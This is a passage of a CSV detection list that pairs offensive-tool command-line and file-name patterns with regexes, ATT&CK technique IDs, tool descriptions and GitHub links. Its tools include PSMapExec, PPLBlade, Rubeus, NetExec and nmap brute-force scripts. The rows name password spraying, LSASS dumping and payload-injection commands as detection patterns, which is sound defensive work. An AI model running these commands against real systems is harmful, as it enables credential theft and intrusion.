Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -method * -nthash *",".{0,1000}\s\-method\s.{0,1000}\s\-nthash\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "* -Method GenRelayList*",".{0,1000}\s\-Method\sGenRelayList.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method SessionHunter*",".{0,1000}\s\-Method\sSessionHunter.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method Spray -AccountAsPassword*",".{0,1000}\s\-Method\sSpray\s\-AccountAsPassword.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method Spray -EmptyPassword*",".{0,1000}\s\-Method\sSpray\s\-EmptyPassword.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method Spray -Hash *",".{0,1000}\s\-Method\sSpray\s\-Hash\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method Spray -Password *",".{0,1000}\s\-Method\sSpray\s\-Password\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* Microsploit.sh*",".{0,1000}\sMicrosploit\.sh.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","0","N/A","N/A","5","435","135","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "* mikrotik-routeros-brute.nse*",".{0,1000}\smikrotik\-routeros\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mimikittenz*",".{0,1000}\smimikittenz.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* mimipy.py*",".{0,1000}\smimipy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* minidump-rs.exe*",".{0,1000}\sminidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* MirrorDump.exe*",".{0,1000}\sMirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "* mmouse-brute.nse*",".{0,1000}\smmouse\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mmouse-exec.nse*",".{0,1000}\smmouse\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* modbus-discover.nse*",".{0,1000}\smodbus\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --mode decrypt --dumpname *.dmp --key *",".{0,1000}\s\-\-mode\sdecrypt\s\-\-dumpname\s.{0,1000}\.dmp\s\-\-key\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --mode dump --name *.exe --handle procexp 
--obfuscate*",".{0,1000}\s\-\-mode\sdump\s\-\-name\s.{0,1000}\.exe\s\-\-handle\sprocexp\s\-\-obfuscate.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --mode dump --name lsass.exe*",".{0,1000}\s\-\-mode\sdump\s\-\-name\slsass\.exe.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --mode proxy --ghidra *--dll *",".{0,1000}\s\-\-mode\sproxy\s\-\-ghidra\s.{0,1000}\-\-dll\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "* -Module kerbdump*",".{0,1000}\s\-Module\skerbdump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* mongodb-brute.nse*",".{0,1000}\smongodb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mongodb-databases.nse*",".{0,1000}\smongodb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mongodb-info.nse*",".{0,1000}\smongodb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* monitor /interval:* /filteruser:*",".{0,1000}\smonitor\s\/interval\:.{0,1000}\s\/filteruser\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* moodlescan -r -u *",".{0,1000}\smoodlescan\s\-r\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -Mouselogger Start*",".{0,1000}\s\-Mouselogger\sStart.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* mouselogger.py*",".{0,1000}\smouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* mqtt-subscribe.nse*",".{0,1000}\smqtt\-subscribe\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mrinfo.nse*",".{0,1000}\smrinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* MS15-034.nse*",".{0,1000}\sMS15\-034\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* ms17010 -i *",".{0,1000}\sms17010\s\-i\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* ms17010 -n *",".{0,1000}\sms17010\s\-n\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - 
scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* msfdb run *",".{0,1000}\smsfdb\srun\s\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* --msfoptions *",".{0,1000}\s\-\-msfoptions\s.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* --msf-path*",".{0,1000}\s\-\-msf\-path.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* msfstaged.exe*",".{0,1000}\smsfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Mshikaki.cpp*",".{0,1000}\sMshikaki\.cpp.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. 
Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "* msrpc-enum.nse*",".{0,1000}\smsrpc\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mssql * -u * -p * -M met_inject*",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smet_inject.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* mssql * -u * -p * -M mssql_priv*",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smssql_priv.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* mssql * -u * -p * -M web_delivery *",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sweb_delivery\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation 
tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* ms-sql-brute.nse*",".{0,1000}\sms\-sql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-config.nse*",".{0,1000}\sms\-sql\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-dac.nse*",".{0,1000}\sms\-sql\-dac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-dump-hashes.nse*",".{0,1000}\sms\-sql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-empty-password.nse*",".{0,1000}\sms\-sql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-hasdbaccess.nse*",".{0,1000}\sms\-sql\-hasdbaccess\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-info.nse*",".{0,1000}\sms\-sql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-ntlm-info.nse*",".{0,1000}\sms\-sql\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
